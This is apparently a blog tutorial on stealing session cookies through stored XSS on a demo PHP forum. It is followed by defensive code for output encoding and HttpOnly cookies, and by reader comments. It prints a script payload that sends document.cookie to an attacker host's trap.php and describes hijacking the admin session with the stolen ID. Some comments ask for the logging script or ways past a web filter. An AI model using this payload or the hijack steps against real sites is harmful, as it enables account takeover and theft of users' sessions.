Hacking Tutorial Cookie Stealing via Cross Site Scripting (XSS) Persistent Type


Type: Tutorial

Level: Medium – Hard

My previous tutorial covered Basic Hacking via Cross Site Scripting (XSS); today's tutorial builds directly on it.

As I wrote in that post, there are two types of Cross Site Scripting (XSS): non-persistent (reflected) and persistent (stored). In a non-persistent attack the injected data is supplied by the web client in a request and only reflected back in that one response. In a persistent attack the server stores the data and then serves it as normal content to every user who views the page.

Today's tutorial shows how to steal cookies through a persistent Cross Site Scripting vulnerability. This kind of vulnerability is far more dangerous than the non-persistent one, because the payload is delivered to every user of the vulnerable page rather than only to victims who open a crafted link. It can give you access to other users' accounts, and even to the administrator who maintains the website.

To make this easier to follow, I have created a simple forum in PHP with a MySQL database. I know this forum is not user friendly and even sucks 😛, but what matters here is the logic of how this attack happens in the real world.

Let me introduce the simple forum first. It has three types of user: Admin, Registered User and Guest (admin, user and guest). All of them share the same board, where they can reply to one another to hold a conversation. Every post is saved in the database, which is why every user can see the posting history.

Let's start the preparation for our tutorial.

Requirements:

1. The simple forum I created; you can download it below (download link)

Download

2. Alternatively, you can search for a vulnerable forum on the internet using Google (that takes much more time 😛)

Step by Step:

1. I have hosted this simple forum on a free web host at vishnuval.byethost10.com. Because I only use one computer, I separate the user and admin sessions by browser: the administrator logs in with Google Chrome and the user logs in with Mozilla Firefox.

username: admin, user, guest

password: admin, user, guest

2. Here is a preview of the main page of our simple forum.

[screenshot]

3. While the admin is logged in, he posts a message welcoming every user.

[screenshot]

4. The user also logs in to the simple forum and starts a conversation.

[screenshot]

5. The admin logs in again and replies to the user.

[screenshot]

6. By the way, this user already knows that the simple forum has an XSS hole: the board renders whatever HTML tags he puts in a post instead of displaying them as text. Now he wants to collect the cookies of everyone who views the message board.

[screenshot]

The malicious user also has a free host at attacker.loveslife.biz, where he hosts a PHP script that records every cookie it receives from the simple forum.

As the picture above shows, the malicious user posts a piece of JavaScript that refers to his host at attacker.loveslife.biz/trap.php. Because the forum stores the post and serves it back unfiltered, that script runs in the browser of every user who opens the board from then on.

7. When the administrator logs in to the simple forum, he notices nothing strange.

[screenshot]

Only if the admin viewed the page source would he see that something is wrong; in my story he doesn't notice it 🙂

8. Soon after the admin logs in, the malicious user opens his log file at attacker.loveslife.biz/thecookie.txt.

[screenshot]

9. The malicious user uses a Mozilla Firefox add-on called Cookies Manager+, which lets him view, modify and add cookies.

[screenshot]

10. He looks for the cookie that belongs to the simple forum and finds it.

[screenshot]

11. The malicious user then edits the cookie value to the one he captured in attacker.loveslife.biz/thecookie.txt.

[screenshot]

12. When he clicks Save, the malicious user's session ID is replaced with the stolen one.

[screenshot]

13. Now he refreshes the page to check whether it works…

[screenshot]

He is already an administrator there 🙂 The forum identifies a logged-in user by nothing but the session ID in that cookie, so whoever presents the admin's ID is the admin.
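To make step 6 concrete, here is an added example (not code from the tutorial or from its forum download) that models how a stored post is rendered to every visitor. The function names, the sample posts and the exact payload shape are assumptions; the tutorial only says the post contains JavaScript pointing at attacker.loveslife.biz/trap.php. The vulnerable renderer concatenates the stored body straight into the page, so the admin's browser executes the script on every visit; the hardened renderer HTML-encodes it so the same post is shown as text.

```javascript
// Added example, not part of the original tutorial or its forum code.
// Models the message board: posts stored by the server are rendered for every
// visitor. Function names and sample data are assumptions for illustration.

const ATTACKER_HOST = "attacker.loveslife.biz"; // host named in the tutorial

// Assumed shape of the malicious post (the tutorial only says it contains
// JavaScript referring to attacker.loveslife.biz/trap.php). It sends the
// viewer's cookies to the attacker's logging script as a query parameter.
const STOLEN_COOKIE_PAYLOAD =
  "<script>new Image().src='http://" + ATTACKER_HOST +
  "/trap.php?c=' + encodeURIComponent(document.cookie);</script>";

// Constructed rows standing in for the forum's MySQL posts table.
const POSTS = [
  { user: "admin", body: "Welcome everyone, enjoy the forum!" },
  { user: "user", body: "Hi admin, thanks! " + STOLEN_COOKIE_PAYLOAD },
];

// Vulnerable rendering: the stored body is concatenated into the HTML verbatim,
// so any tag the user submitted becomes part of the page for every viewer.
function renderPostVulnerable(post) {
  return "<div class=\"post\"><b>" + post.user + "</b>: " + post.body + "</div>";
}

// Contextual output encoding for an HTML text node or quoted attribute value.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Hardened rendering: both fields are encoded at output time, so the payload
// is displayed as literal text and never parsed as markup.
function renderPostSafe(post) {
  return "<div class=\"post\"><b>" + escapeHtml(post.user) + "</b>: " +
    escapeHtml(post.body) + "</div>";
}

// Builds the board page the way the forum would for any logged-in visitor.
function renderBoard(posts, renderPost) {
  return "<html><body>\n" + posts.map(renderPost).join("\n") + "\n</body></html>";
}

// Reports whether rendered output contains a live script element, i.e. whether
// the persistent payload survived into the page as markup rather than text.
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}

const vulnerablePage = renderBoard(POSTS, renderPostVulnerable);
const safePage = renderBoard(POSTS, renderPostSafe);

console.log("vulnerable page executes script:", containsLiveScript(vulnerablePage)); // true
console.log("hardened page executes script:  ", containsLiveScript(safePage)); // false
```

The same check applies to the real forum: if viewing the board's page source shows a raw `<script>` element inside a post, the renderer is concatenating stored input, which is exactly what step 7 relies on the admin not noticing.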

If the step-by-step above is not clear, you can also watch the video below.

Countermeasures / Prevention:

1. Developers must treat every piece of user input as untrusted. Validate it on input and, above all, encode it for the context it is rendered in (HTML entity encoding for a post body) so that submitted tags are displayed as text rather than executed.

2. Mark the session cookie HttpOnly so that injected script cannot read it through document.cookie; that alone would have stopped the collection in step 8. Add the Secure flag when the site runs over HTTPS. Note that HttpOnly does not stop the injected script from making requests as the admin from inside the page, so it complements output encoding rather than replacing it.
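An added example (not from the tutorial) of the session-cookie side of the defence: a helper that emits the Set-Cookie header a session should be sent with, an audit function that flags a header missing the hardening flags, and a small simulated cookie jar showing what document.cookie exposes to injected script. The helper names, the cookie name PHPSESSID and the sample values are assumptions.

```javascript
// Added example, not part of the original tutorial. Helper names, the cookie
// name PHPSESSID and the sample values are assumptions for illustration.

// Builds a Set-Cookie header value for a session cookie with the hardening
// flags set. HttpOnly keeps it out of document.cookie; Secure restricts it to
// HTTPS; SameSite limits when browsers attach it to cross-site requests.
function buildSessionCookie(name, value, options = {}) {
  const { secure = true, sameSite = "Lax", maxAge } = options;
  // RFC 6265 token characters for the name; reject separators in the value so
  // a crafted session ID cannot smuggle extra attributes into the header.
  if (!/^[A-Za-z0-9!#$%&'*+\-.^_`|~]+$/.test(name)) {
    throw new Error("invalid cookie name");
  }
  if (value.length === 0 || /[\s;,"\\]/.test(value)) {
    throw new Error("invalid cookie value");
  }
  const parts = [name + "=" + value, "Path=/", "HttpOnly"];
  if (secure) parts.push("Secure");
  parts.push("SameSite=" + sameSite);
  if (maxAge !== undefined) parts.push("Max-Age=" + String(maxAge));
  return parts.join("; ");
}

// Parses one Set-Cookie header value into the attributes a browser would keep.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const cookie = {
    name: pair.slice(0, eq),
    value: pair.slice(eq + 1),
    httpOnly: false,
    secure: false,
    sameSite: null,
  };
  for (const attr of attrs) {
    const [k, v] = attr.split("=");
    const key = k.toLowerCase();
    if (key === "httponly") cookie.httpOnly = true;
    else if (key === "secure") cookie.secure = true;
    else if (key === "samesite") cookie.sameSite = v;
  }
  return cookie;
}

// Lists the hardening flags a Set-Cookie header is missing; empty means OK.
function auditSetCookie(header) {
  const c = parseSetCookie(header);
  const missing = [];
  if (!c.httpOnly) missing.push("HttpOnly");
  if (!c.secure) missing.push("Secure");
  if (!c.sameSite) missing.push("SameSite");
  return missing;
}

// Simulates document.cookie: the browser exposes only non-HttpOnly cookies to
// script, so an injected payload cannot read a HttpOnly session ID.
function scriptVisibleCookies(jar) {
  return jar
    .filter((c) => !c.httpOnly)
    .map((c) => c.name + "=" + c.value)
    .join("; ");
}

// Constructed headers: how a plain PHP session cookie is typically sent,
// versus the hardened form. The session ID value is made up.
const WEAK_HEADER = "PHPSESSID=9d4d2c1e6a8f; Path=/";
const HARDENED_HEADER = buildSessionCookie("PHPSESSID", "9d4d2c1e6a8f");

const weakJar = [parseSetCookie(WEAK_HEADER), parseSetCookie("theme=dark; Path=/")];
const hardenedJar = [parseSetCookie(HARDENED_HEADER), parseSetCookie("theme=dark; Path=/")];

console.log("missing on weak header:", auditSetCookie(WEAK_HEADER));
console.log("script sees (weak):    ", scriptVisibleCookies(weakJar));
console.log("script sees (hardened):", scriptVisibleCookies(hardenedJar));
```

For a PHP forum like the one in this tutorial, the hardened header corresponds to calling session_set_cookie_params() with the secure and httponly options, or setting session.cookie_httponly and session.cookie_secure in php.ini, before session_start().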

I hope it's useful 🙂


Blogger at hacking-tutorial.com. Loves PHP, offensive security and the web. Contact him at me[-at-]vishnuvalentino.com

Visit Website: http://www.vishnuvalentino.com

  • manoj kumar

Have you tested it on Facebook?
It is working on your own website's cookie.
Does Facebook have a similar session ID?

You get the affected session ID because you can log in to it. How can anybody get another person's session ID?

    • v4L

#manoj kumar
1. I haven't tested it, but maybe Facebook's session isn't as easy as what I've demonstrated here.
2. If it's persistent, you will get many session IDs; if not persistent, you need to make sure the victim opens the malicious URL.

      • dark_soldier

How to find XSS-vulnerable sites? Is there any software to check whether a website is vulnerable to XSS???

        • flame

(commenting for other users' benefit, 2 years after the above comment)
You can refer to the main XSS tutorial for an accurate result (you get the page), or try the Acunetix web vulnerability scanner, but you can only detect what type of vuln it is, not where the vuln occurs..

  • moshe

    nice !!

• Great presentation, but these types of vulnerabilities are rarely found nowadays…

    • v4L

      #vinay
Yes, because most of them use a CMS nowadays.

  • khansaa

Hi.. I cannot download the forum. Any help?

  • xssatack

    How to start this forum which I downloaded?

  • JaSamDemoUssama

I get the session ID and I don't know how to use it. I use the cookie manager but it doesn't work for me! Does this work all the time?

  • car

    Hi,

Can someone tell me how I can steal a cookie using onload?
    Any help will be appreciated.

  • Ahsun Iqbal

I am getting an SQL error.. What can I do??

    • Parvez

Hi. Do you have the code to run this forum? I badly need something like this for my Masters research. Please help me out.

  • taib abdel

Please, what can I do to bypass Websense Triton? Even Tor and Ultrasurf can't bypass it. Thx in advance.

  • Parvez

Hi. How can I get the code to run the forum? I need it badly, as I need something like this for my Masters research paper. Pls help me out, please.

  • bala

I am getting Wrong Username or Password… tried all credentials.. pls help me

  • Ali

Sorry Admin, I own you… hehe JK lol

  • kris

    alert(“fuck this tutorial”)

    • KSI

      hahahahahahhahahahhahah good 1 m8

  • lets try ._.

    alert(“:v”)

  • :|

    alert(“TEST”)

  • mzabab

    nice

• דינדו מחמודי

How do I build this “trap.php” which can record cookies?

  • qwert

    hi

  • qwert

    bold

  • :)

    hi

  • DWADAWD

    alert(“tutorial”);

  • skkie

    alert(“tutorial”);

  • someone
  • Test

    alert(“tutorial”);

  • :D

    “>